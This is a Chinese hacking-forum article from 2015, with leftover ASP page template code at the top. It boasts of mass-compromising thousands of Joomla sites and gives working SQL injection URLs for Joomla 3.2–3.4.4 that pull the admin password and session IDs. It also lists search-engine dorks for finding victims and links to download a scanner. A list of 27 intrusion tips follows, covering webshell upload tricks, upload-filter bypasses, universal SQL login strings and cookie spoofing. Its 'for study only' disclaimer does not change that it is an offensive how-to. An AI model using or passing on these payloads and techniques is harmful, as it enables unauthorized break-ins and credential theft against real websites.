<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("漏洞分析,工具使用") PageTitle=stripHTML("日千站,漏洞分析加工具使用【附下载】") ArticleIntro=stripHTML("昨天晚上没事,写个扫描软件,自动拿站,早上起来发现有好几千个有漏洞哦。下面具体聊聊吧。") Articlecontent=stripHTML("昨天晚上没事,写个扫描软件,自动拿站,早上起来发现有好几千个有漏洞哦。下面具体聊聊吧。  Joomla!是一套在国外相当知名的内容管理系统。Joomla!是使用…") ModuleName = stripHTML("hack") InfoID = stripHTML("214921") ChannelShortName=stripHTML("Hack") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("hack") %> 日千站,漏洞分析加工具使用【附下载】 - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> Hack >> 黑客技术 >> 黑客入侵 >> 正文

[组图]日千站,漏洞分析加工具使用【附下载】

2015/10/24 作者:黑白之道 来源: 黑白之道
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>


  昨天晚上没事,写个扫描软件,自动拿站,早上起来发现有好几千个有漏洞哦。下面具体聊聊吧。

  Joomla!是一套在国外相当知名的内容管理系统。Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、 Windows、MacOSX等各种不同的平台上执行。目前是由Open Source Matters(见扩展阅读)这个开放源码组织进行开发与支持,这个组织的成员来自全世界各地,小组成员约有150人,包含了开发者、设计者、系统管理者、文件撰写者,以及超过2万名的参与会员。所以用的人非常 多。

  暴出一个最新漏洞,之前也有不少漏洞,给出一个漏洞扫描器,老版本的,

  ~~~~~~~~~~

  Joomla漏洞扫描器(Madleets Jscan)

  Joomla 是一款著名的PHP内容管理系统,有许多站长都在使用Joomla,而本次提供的Madleets Jscan 则可以帮助您扫描Joomla的漏洞,从而杜绝黑客的入侵。可以检测Joomla整站程序搭建的网站是否存在文件包含、sql注入、命令执行等漏洞。这将帮助web开发人员和网站管理人员识别可能存在的安全弱点。



  1、确切的版本探测(可以探测出使用的Joomla整站程序的版本).

  2、常见的Joomla!基于web应用程序防火墙探测。

  3、搜索已知的Joomla安全漏洞和它的组件。

  4、文本和HTML格式的检测报告.

  5、立即的软件更新能力

  下载地址:http://www.veryhuo.com/down/html/72834.html

  这个是之前的扫描程序,后面重新改过了。

  下面说个CMS Joomla 3.2—3.4.4最新的漏洞

  近日,Trustwave SpiderLabs 研究员Asaf Orpani 发现知名CMS Joomla 3.2—3.4.4版本中存在SQL注入漏洞,经安全狗实验室检测该漏洞危害巨大,影响范围广,利用难度低。目前官方已在3.4.5版本中修复该漏洞,请相关网站及时更新。

  漏洞详细说明与利用方法

  据 Asaf Orpani 分析得出,该SQL注入漏洞存在于

  /administrator /components /com_contenthistory/ models/history.php 处。





  以下几行描述Joomla原理的代码则可以帮助我们去利用这个漏洞(Payload)



  执行该段代码之后返回页面如下,可直接获取用户session:



  经测试可用如下payload直接获取管理员密码:

  http://www.77169.com/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  如图示:



  以上payload不能爆session_id,经过我们实验室修改后下面这段可以完美爆session_id 。

  /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]= (select 1=updatexml(1,concat(0x5e24,(select session_id from jml_session limit 0,1),0x5e24),1))

  如下图所示:



  而在详细的了解了该漏洞的利用原理之后,给简单的办法吧,

  ~~~~~~~~~~~~

  给个祥细,简单拿站过程

  google hack,

  百度 hack

  搜索,

  powered by joomla

  index.php?option=com_user&view=reset&layout=confirm

  administrator/

  接着工具上,

  ~~~~~~~~~~~~~~~~~~

  文中提及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!



  百度网盘:http://pan.baidu.com/s/1sjta8Lv

  下面就搞定了呀~~

  在微信中不可能写的非常祥细,一会微信又给封了这篇文章,所以有问题大家在群里,论坛讨论吧。

  附总结的一些入侵技巧,

  【入侵技巧】

  1.数据库备份拿shell的时候有时候不成功就备份成解析格式的试试

  2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马在代码最前面加上gif89a试试

  3.当后台有数据库备份但没有上传点时,把一句话木马插到任意处,数据库备份里备份成asp木马,再用一句话客户端连接木马

  4.当网站前台有“会员注册” 注册一个账户进去看看有没有上传点,有的话直接上传asp木马以及利用iis6.0解析漏洞,不行就抓包用明小子上传

  5.当页面提示只能上传jpg|gif|png等格式的时候,右键查看源文件,本地修改为asp|asa|php再本地上传即可拿下shell

  6.入侵网站之前连接下3389,可以连接上的话先尝试弱口令,不行就按5次shift键,看看有没有shift后门,再尝试后门弱口令

  7.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里,选择浏览器-拦截跳转勾选–查看即可直接进入后台

  8.ewebeditor编辑器后台增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了,就增加一个aaspsp再上传asp木马就会解析成功了

  9.当注入工具猜解表段,但猜解字段时提示长度超过50之类,不妨扔到穿山甲去猜解试试,有时候就能成功猜解

  10.当获得管理员密码却不知道管理员帐号时,到网站前台找新闻链接,一般“提交者”“发布者”的名字就是管理员的帐号了

  11.菜刀里点击一句话木马地址右键,选择虚拟机终端,执行命令出现乱码时,返回去设置编码那里,将默认的GB2312改为UTF-8

  12.破解出md5为20位,就把前3位和后1位去掉,剩余16位拿去CMD5解密就可以了

  13.有时在木马代码里加上gif89a,上传成功访问的时候却出现了像图片一样的错误图像,说明服务器把gif89a当做图片来处理了,不要带gif89a就可以

  14.网站的主站一般都很安全,这时就要旁注或C段了,但是想知道各个IP段开放了什么端口吗?用“啊D网络工具包”里面的IP端口扫描最明细了

  15.有的后台不显示验证码,往注册表里添加一个ceg即可突破这个困境了,把下面的代码保存为Code.reg,双击导入就可以了

  REGEDIT4

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]

  “BlockXBM”=dword:00000000

  16.旁注入侵的时候,建议挑php的站点来日,因为php站点一般都支持aspx脚本,aspx里权限比较大,对提权希望比较大呢

  17.在注入点后面加上-1,若返回的页面和前面不同,是另一个正常的页面,则表示存在注入漏洞,而且是数字型的注入漏洞,在注入点后面加上-0,若返回的页面和之前的页面相同,然后加上-1,返回错误页面,则也表示存在注入漏洞,而且也是数字型的注入漏洞

  18.linux的解析格式:1.php.xxx (xxx可以是任意) 如果apache不认识后缀为rar的文件,就用1.php.rar格式上传,文件就会被服务器当做PHP脚本解析

  19.辨别linux系统方法:例如:http://www.xxx.com/xxx/abc.asp?id=125 把b换成大写B访问,如果出错了,就说明是linux系统,反之是windows系统

  20.如何探测服务器上哪些站点支持aspx呢? 利用bing搜索:http://cn.bing.com/ 搜索格式:ip:服务器ip aspx

  21.PHP万能密码(帐号:’ UNION Select 1,1,1 FROM admin Where ”=’密码:1)

  22.ASP万能密码(帐号密码均是’or’=’or’或admin’or’1=1)

  23.当我们通过注入或是社工把管理员的帐号跟md5密码搞到手的时候,却发现破解不出密码 (MD5是16位加密的),那么我们就可以用COOKIE欺骗来绕过,利用桂林老兵的cookie欺骗工具,把自己的ID以及md5密码都修改成管理员的,再修改cookie,访问时就会实现欺骗了

  24.倘若目标站开了cdn加速,真实地址会被隐藏起来,我们想搞它就比较困难了。

  25.一般而言,后台插一句话,如果数据库扩展名是asp的话,那么插数据库,但是如果有配置文件可以插的话,那肯定是插入配置文件了,但是插入配置文件有一个很大的风险,那就是一旦出错那么全盘皆输,有可能不仅仅造成后台无法登陆,甚至有可能是整个网站系统崩溃,所以插入配置文件,请慎之又慎。

  26.自己的03服务器系统运行burp命令:java -jar bs1407.jar

  27.记得常扫inc目录,很多时候存在fck编辑器

  如果你觉得比较好,可以打赏比特币,哈哈

  比特币赞助打赏地址:13sbdFRyFBeqmXY9GJQf66s5cwmvLvWaAD

  ----------------------------------

  要闻、干货、原创、专业

  关注“黑白之道” 微信:i77169

  华夏黑客同盟我们坚持,自由,免费,共享!